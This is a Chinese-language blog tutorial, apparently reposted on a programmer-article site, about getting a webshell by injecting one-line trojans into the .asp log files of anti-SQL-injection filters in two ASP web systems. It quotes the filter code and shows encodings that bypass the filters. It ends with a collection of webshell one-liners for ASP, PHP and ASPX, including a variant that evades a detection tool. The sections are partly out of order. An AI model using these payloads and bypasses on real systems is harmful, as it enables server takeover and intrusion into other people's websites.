欢迎您访问程序员文章站本站旨在为大家提供分享程序员计算机编程知识!
您现在的位置是: 首页  >  网络运营

一句话木马后门在防注入中的重生

程序员文章站 2022-03-18 21:09:21
一句话木马后门在防注入中的重生对于目前流行的sql注入,程序员在编写程序时,都普遍的加入防注入程序,有些防注入程序只要在我们提交一些非法的参数后,就会自动的记录下你的IP地址,提交的非法参数和动作等,同时也把非... 17-04-29...

对于目前流行的sql注入,程序员在编写程序时,都普遍的加入防注入程序,有些防注入程序只要在我们提交一些非法的参数后,就会自动的记录下你的ip地址,提交的非法参数和动作等,同时也把非法提交的数据写入了系统的后缀为asp的文件中,这也给了我们一些可利用的地方,大家知道,一句话马就是利用程序过滤的不完全而写入的,按照这思路,我们是否可以在提交非法参数中加入一句话马而防注入程序就会记录我们提交的数据和一句话马并写入数据库,从而得到一个webshell呢?呵呵,答案是肯定的,但对于要写入的一句话马如何绕过过滤的程序,却是个难题,常见的一句话马格式为”<%execute request(“a”)%>,而<%%>就很难绕过html的过滤, 但我们可以通过不同的方法来绕过,下面我分别以二个系统来讲解:

打开”http://127.0.0.1/2005/sia-log.asp,出现了”类型不匹配:’execute’,显示内部错误的ie选项显示好友错误钩掉就可以了。我们再用一句话客户端来接连上传后成功得到一个webshell。

例二:再谈谈” 快乐视听音乐网 v4.0版本”系统的利用和分析:

系统加强防sql注入, 取消asp页面, 对不友好的ip或ip段进行*。自动封注入者ip功能,使注入者不能再访问本站!可后台管理、显示系统界面。当在参数后提交非法数据时,系统自动记录你的ip地址,提交的非法参数和动作等,然后系统屏蔽了你的ip地址,
让你再无法访问网站。我们先看下防注入sql.asp文件中的部分代码,读过防注入代码的人一眼就能看出来这个文件是个修改版的。

 

<%
‘——–说明——————
‘sql防注入加强版
‘——–数据库连接部分————–
dim dbkillsql,killsqlconn,connkillsql
dbkillsql="data/#sql.asp"
‘on error resume next
set killsqlconn = server.createobject("adodb.connection")
connkillsql="provider=microsoft.jet.oledb.4.0;data source=" & server.mappath(dbkillsql)
killsqlconn.open connkillsql
if err then
       err.clear
       set killsqlconn = nothing
      response.write "数据库连接出错,请检查连接字串。"
       response.end
end if
‘——–定义部份——————
dim fy_post,fy_get,fy_in,fy_inf,fy_xh,fy_db,fy_dbstr,kill_ip,writesql
‘自定义需要过滤的字串,用 "|" 分隔
fy_in = "’|;|and|(|)|exec|insert|select|delete|update|count|*|%|chr|mid|master|truncate|char|declare"
kill_ip=true
writesql=true              以下略过
在sql.asp文件中,对下面出现在”|”分隔中的字符进行了拦截:
fy_in = "’|;|and|(|)|exec|insert|select|delete|update|count|*|%|chr|mid|master|truncate|char|declare"

也就说明了只有提交这些出现在”|”分隔的被过滤的字符串,才会被防注入系统写入数据库中而且是被写入到data目录中的#sql.asp文件中,其后缀为.asp的,刚好可以被我们利用,

同样的道理,当你提交"<%execute request(chr(97))%>时,%被过滤了

我们把一句话小马加密成"<%25execute request(chr(97))%25>"还是被过滤了,因为%还是存在我们把一句话改成"<script runat=server language=vbscript>eval request(chr(97))</script>这样整句中就没有出现“%“,提交后则成功完整的被写入

用一句话客户端连接并提交成功得到webshell。如果连接出错,换个一句话连接工具laker2的不错。

总结:

以上只是对这二个系统出现的漏洞一个方面的分析和利用,当然这类系统也存在着其它方面的漏洞如cookie的注入

例一西亚购物系统的利用和分析:

“西亚购物系统做了全面性安全处理, ‘数据库防下载处理/conn防止暴库处理/防止跨站脚本攻击/sql注入式攻击防范/禁止脱机浏览工具/前台登陆验证码/后台登陆验证码/

‘会员密码md5加密/管理员密码md5加密/数据来源安全性监测/sql注入代码过滤/html代码过滤及防护/管理员登陆日至记录/攻击记录及恶意ip屏蔽/非法操作代码日至记录/吧安全网 “

当我们在参数提交非法参数时,弹出防注入的页面
    大家看到这时我们已转到”http://127.0.0.1/2005/error.asp?allquery=id=381’的这个页面上了我们来看conn.asp文件中部分防注入的代码,代码太长就贴点关键,百度老说老子文章长

if instr(allquery,"%20")<>0 or instr(allquery,"%27")<>0 or instr(allquery,"’")<>0 or instr(allquery,"%a1a1")<>0 or instr(allquery,"%24")<>0 or instr(allquery,"$")<>0 or instr(allquery,"%3b")<>0 or instr(allquery,";")<>0 or instr(allquery,":")<>0 or instr(allquery,"%%")<>0 or instr(allquery,"%3c")<>0 or instr(allquery,"<")<>0 or instr(allquery,">")<>0 or instr(allquery,"–")<>0 or instr(allquery,"sp_")<>0 or instr(allquery,"xp_")<>0 or instr(allquery,"exec")<>0 or instr(allquery,"/")<>0 or instr(allquery,"delete")<>0 or instr(allquery,"dir")<>0 or instr(allquery,"exe")<>0 or instr(allquery,"select")<>0 or instr(allquery,"update")<>0 or instr(allquery,"cmd")<>0 or instr(allquery,"*")<>0 or instr(allquery,"^")<>0 or instr(allquery,"(")<>0 or instr(allquery,")")<>0 or instr(allquery,"+")<>0 or instr(allquery,"copy")<>0 or instr(allquery,"format")<>0 then%>

    对提交的非法数据中包含以上被搜索到的字符串的话,就自动跳转到”error.asp的页面去,而在”error.asp文件中有以下部分代码:

 

toppath = server.mappath("sia-log.asp")
set fs = createobject("scripting.filesystemobject")
if not fs.fileexists(toppath) then
set ts = fs.createtextfile(toppath, true)
.
.

set ts= fs.opentextfile(toppath,1)
do while not ts.atendofstream
errorlog = errorlog & ts.readline & chr(13) & chr(10)

当你提交非法数据时,程序就会获得你的ip,并创建一个fso对象,再利用fso对象自动创建sia_log.asp文件,并将非法提交的字符写入文件中

打开” http://127.0.0.1/2005/sia-log.aspp页面,则看到文件记录了我们刚才提交的数据,如图:

这说明我们刚才的提交的非法参数已写入了这个文件中,

3:那么,我们在这个页面的参数后插入一句话如何
却没有弹出相应的对话框,说明没有写入到sia-log.as这个文件中,我们把地址换成” http://127.0.0.1/2005/error.asp?allquery=id=381”再来试试,如图

提交后弹出我们希望看到的页面。

可我们再打开”sia-log.asp”文件却看到小马被过滤了成<execute request(“a”)> %号和"都过滤了。从这儿,我们知道%被过滤掉了而小写a旁双引号被转换了,大家自己比较下,好了,知道这点,我们就可以重新构造我们的小马了。其实绕过这个还是很简单的。因为一句话写法很多。

备份专用

<%eval(request("a")):response.end%>

asp一句话
<%execute(request("1"))%>

php一句话

<?php eval($_post[1]);?>

aspx一句话

<script language="c#" runat="server">
webadmin2y.x.y aaaaa = new webadmin2y.x.y("add6bb58e139be10");
</script>

可以躲过雷客图的一句话。

<%
set ms = server.createobject("msscriptcontrol.scriptcontrol.1")
ms.language="vbscript"
ms.addobject "response", response
ms.addobject "request", request
ms.executestatement("ev"&"al(request(""1""))")
%>

不用'<,>’的asp一句话

<script language=vbscript runat=server>execute request("1")</script>

不用双引号的一句话。

<%eval request(chr(35))%>

这里我就用工具捣鼓一下,打开””这款工具,把”<%” ,“execute 和request之间的空格及”(“a”)%>”相应的进行转换,这样原一句话马就被加密成” %3c%25execute+request%28%22%61%22%29%25%3e” 或转换成<%25execute request(chr(97))%25>,分别提交后,我们打开sia-log.asp文件后,可以清楚看到,二次提交的一句马都成功的被写入到sia_log.asp文件中了,